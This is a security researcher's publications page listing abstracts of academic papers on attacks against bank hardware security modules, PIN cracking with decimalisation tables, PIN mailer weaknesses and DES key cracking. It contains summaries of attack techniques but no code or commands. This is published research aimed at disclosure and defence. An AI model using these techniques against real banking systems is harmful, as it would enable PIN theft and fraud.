Mike Bond University of Cambridge - Computer Laboratory Email : Mike.Bond@cl.cam.ac.uk Phone : +44 (0)1223 7-63571 Mobile: +44 (0)7890 171913 Fax : +44 (0)1223 3-34678 "The only way to understand the wheel is to reinvent it." -- Me (I think!) Home   Research   Resources   Phantom

Publications Quick Find

Full Publications List with Abstracts

• Laser-printed PIN Mailer Vulnerability Report
  Jul 2005, jointly with Steven Murdoch and Jolyon Clulow
  
  Abstract
  Tamper-evident laser-printed PIN mailers are used by many institutions to issue PINs and other secrets to individuals in a secure manner. Such mailers are created by printing the PIN using a normal laser, but on to special stationery and using a special font. The background of the stationery disguises the PIN so that it cannot be read with the naked eye without tampering. We show that currently deployed PIN mailer technology (used by the major UK banks) is vulnerable to trivial attacks that reveal the PIN without tampering. We describe image processing attacks, where a colour difference between the toner and the stationary masking pattern is exploited. We also describe angled light attacks, where the reflective properties of the toner and stationery are exploited to allow the naked eye to separate the PIN from the backing pattern. All laser-printed mailers examined so far have been shown insecure.
  
  Download this paper as a PDF file (750k)
  
  
  
• The Dining Freemasons
  21st April 2005, jointly with George Danezis,
  International Security Protocols Workshop, Cambridge UK
  
  Abstract
  We continue the popular theme of offline security by considering how computer security might be applied to the challenges presented in running a secret society. We discuss membership testing problems and solutions, set in the context of security authentication protocols, and present new building blocks which could be used to generate secret society protocols more robustly and generically, including the lie channel and the compulsory arbitrary decision model.
  
  Download this paper as a PDF file (95k)
  
  
  
• Cryptographic Processors -- A Survey
  April 2005, jointly with Ross Anderson, Jolyon Clulow, Sergei Skorobogatov
  IEEE Special Issue (to appear)
  
  Abstract
  Tamper-resistant cryptographic processors are becoming the standard way to enforce data-usage policies. Their history began with military cipher machines, and hardware security modules used to authenticate themselves to ATMs. In both cases, the designers wanted to prevent abuse of data and key material should a device fall into the wrong hands. From these specialist beginnings, cryptoprocessors spread into devices such as prepayment electricity meters, and the vending machines that sell credit for them. In the 90s, tamper-resistant smartcards became integral to GSM mobile phone indentification and to key management in pay-TV set-top boxes, while secure microcontrollers were used in remote key entry devices for cars. In the last five years, dedicated crypto chips have been embedded in devices from games consoles accessories to printer ink cartridges, to control product and accessory aftermarkets. The "Trusted Computing" initiative will soon embed cryptoprocessors in PCs so that they can identify each other remotely. This paper surveys the range of applications of tamper-resistant hardware, and the array of attack and defence mechanisms which have evolved in the tamper-resistance arms race.
  
  Download this paper as a PDF file (450k)
  
  
  
• Encrypted? Randomised? Compromised? (When Cryptographically Secured Data is Not Secure)
  6th July 2004, jointly with Jolyon Clulow
  Cryptographic Algorithms and Their Uses, Eracom Workshop 2004, Queensland Australia
  
  Abstract
  Protecting data is not simply a case of encrypt and forget: even data with full cryptographic confidentiality and integrity protection can still be subject to information leakage. We consider the issue of information leakage through side channels in protocols. Previous work by Bond and Clulow identifed multiple vulnerabilities in APIs for financial PIN processing systems, and suggested remedies; however our work here shows that the fixes do not work, and that the problem of information leakage in these APIs has still not been adequately addressed. We argue that information flow and leakage analysis will play an important role in the security of encrypted databases in the future.
  
  Download this paper as a PDF file (137k)
  
  
  
• Extending Security Protocols Analysis : New Challenges
  4th July 2004, jointly with Jolyon Clulow
  Automated Reasoning and Security Protocols Analysis 2004, Cork, Ireland
  
  Abstract
  We argue that formal analysis tools for security protocols are not achieving their full potential, and give only limited aid to designers of more complex modern protocols, protocols in constrained environments, and security APIs. We believe that typical assumptions such as perfect encryption can and must be relaxed, while other threats, including the partial leakage of information, must be considered if formal tools are to continue to be useful and gain widespread, real world utilisation. Using simple example protocols, we illustrate a number of attacks that are vital to avoid in security API design, but that have yet to be modelled using a formal analysis tool. We seek to extract the basic ideas behind these attacks and package them into a wish list of functionality for future research and tool development.
  
  Download this paper as a PDF file (150k)
  
  
  
• Understanding Security APIs
  1st June 2004, Phd Thesis
  University of Cambridge Computer Laboratory
  
  Abstract
  This thesis introduces the newly-born field of Security API research, and lays the foundations for future analysis, study, and construction of APIs. Security APIs use cryptography to enforce a security policy on the users of the API, governing the way in which they manipulate sensitive data and key material. The thesis begins examining the origins and history of Security APIs, and that of HSMs -- tamper-resistant cryptographic processors which implement the APIs. The key contribution is a catalogue of new attacks and attack techniques for Security APIs, including both historic attacks and new unpublished work. The thesis goes on to provide a body of advice for Security API design, consisting of heuristics and discussions of key issues, including those most pertinent to modern HSMs such as authorisation and trusted paths. The advice is linked in with the cautionary tales of Security API failures from the previous chapters. As the thesis is opening a new field of academic research, its main objective is to build understanding about Security APIs.
  
  Download core chapter 3 "Origins of Security API Attacks", and 7 and 10 as PDF file (700k)
  
  Download the entire thesis as a PDF file (1.8MB)
  
  Disclaimer: This thesis was produced to satisfy an examination committee, rather than directly for peers, and as such, the material may not be optimally presented for purposes of future research and industrial interaction. In due course I hope to release a new slightly improved version. The fundamental content will remain the same of course!
  
  
  
• Unwrapping the Chrysalis
  1st June 2004, jointly with Steven Murdoch and Daniel Cvrcek
  Computer Laboratory Technical Report TR-592
  
  Abstract
  We describe our experiences reverse engineering the Chrysalis- TS Luna CA3 - a PKCS#11 compliant cryptographic token. Emissions analysis and security API attacks are viewed by many to be simpler and more efficient than a direct attack on an HSM. But how difficult is it to actually "go in the front door"? We describe how we unpicked the CA3 internal architecture and abused its low-level API impersonate a CA3 token in its cloning protocol - and extract PKCS#11 private keys in the clear. We quantify the effort involved in developing and applying the skills necessary for such a reverse-engineering attack. In the process, we discover that the Luna CA3 has far more undocumented code and functionality than is revealed to the end-user, and discuss the impact of this on the security of the token.
  
  Download this paper as a PDF file (345k). (Sample code also available here).
  
  
  
• Decimalisation Table Attacks for PIN Cracking
  February 2003, jointly with Piotr Zielinski
  a Computer Laboratory Technical Report
  
  Abstract
  We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a £300 withdrawal limit per card, the potential bounty is raised from £7200 to £2.1 million and a single motivated attacker could withdraw £30-50 thousand of this each day. This attack thus presents a serious threat to bank security.
  
  Download this paper as a PDF file (132k)
  
  
  
• Protocol Analysis, Composability and Computation
  January 2003, jointly with Ross Anderson
  A short paper for "Computer Systems : Papers for Roger Needham"
  
  Download the paper as an HTML page (~50k)
  
  
  
• Experience Using a Low-Cost FPGA Design to Crack DES Keys
  1st August 2002, jointly with Richard Clayton
  Presented at CHES 2002 Workshop in San Francisco
  
  Abstract
  This paper describes the authors' experiences attacking the IBM 4758 CCA, used in retail banking to protect the ATM infrastructure. One of the authors had previously proposed a theoretical attack to extract DES keys from the system, but it failed to take account of real-world banking security practice. We developed a practical scheme that collected the necessary data in a single 10-minute session. Risk of discovery by intrusion detection systems made it necessary to complete the key "cracking" part of the attack within a few days, so a hardware DES cracker was implemented on a US$995 off-the-shelf FPGA development board. This gave a 20-fold increase in key testing speed over the use of a standard 800 MHz PC. The attack was not only successful in its aims, but also shed new light on the protocol vulnerabilities being exploited. In addition, the FPGA development led to a fresh way of demonstrating the non-randomness of some of the DES S-boxes and indicated when pipelining can be a more effective technique than replication of processing blocks. The wide range of insights we obtained demonstrates that there can be significant value in implementing attacks "for real".
  
  Download this paper as a PDF file (166k)
  
  
  
• API Level Attacks on Embedded Systems
  2nd May 2001, jointly with Ross Anderson
  IEEE Computer Magazine Oct 2001 p67-75
  
  Abstract
  A whole new family of attacks has recently been discovered on the application programming interfaces (APIs) used by security processors. These extend and generalise a number of attacks already known on authentication protocols. The basic idea is that by presenting valid com- mands to the security processor, but in an unexpected sequence, it is possible to obtain results that break the security policy envisioned by its designer. Such attacks are economically important, as security processors are used to support a wide range of services, from automatic teller machines through pay-TV to prepayment utility metering. Designing APIs that resist such attacks is difficult, as a typical security processor needs a substantial command set with several dozen commands that allow it to service a number of external and internal protocols. The attacks are also scientifically interesting; preventing them may become an important new application area for formal methods and design verification tools generally.
  
  Download an earlier version of this paper as a PDF file (126k)
  
  
  
• Attacks on Cryptoprocessor Transactions Sets
  31st January 2001 , Presented at the CHES 2001 Workshop in Paris
  http://www.chesworkshop.org
  
  Abstract
  Attacks are presented on the IBM 4758 CCA (the first ever security module to have achieved all round FIPS140-1 Level 4 certification) and the Visa Security Module. Two new attack principles are demonstrated. Related key attacks use known or chosen differences between two cryptographic keys. Data protected with one key can then be abused by manipulation using the other key. Meet in the middle attacks work by generating a large number of unknown keys of the same type, thus reducing the key space that must be searched to discover the value of one of the keys in the type. Design heuristics are presented to avoid these attacks and other common errors.
  
  Download this paper as a PDF file (140k)
  
  
  
• A Chosen Key Difference Attack on Control Vectors
  1st November 2000 , Unpublished
  

Abstract
An attack on the implementation of control vectors in the IBM Common Cryptographic Architecture is presented. The final key part holder in a multiple part import introduces two key encrypting keys (KEKs), one the intended key and one with a chosen difference from the former, by including this difference in his own key part. When this difference is set to the difference between two control vectors, keys originally encrypted with the former KEK can be cast to a new type by importing them under the latter KEK. Thus unauthorised type casts can be made from an arbitrary source type to any destination type the attacker has permission to use.

Download this paper as a PDF file (17k)



• IBM Comment on 'A Chosen Key Difference Attack on Control Vectors'
  16th January 2001 , IBM's Response to my first (unpublished) paper
  
  Download this paper as a PDF file (32k)
  
  

Seminars

Page created : 22nd November '00
Last update : 11th Nov '18

Mike.Bond@cl.cam.ac.uk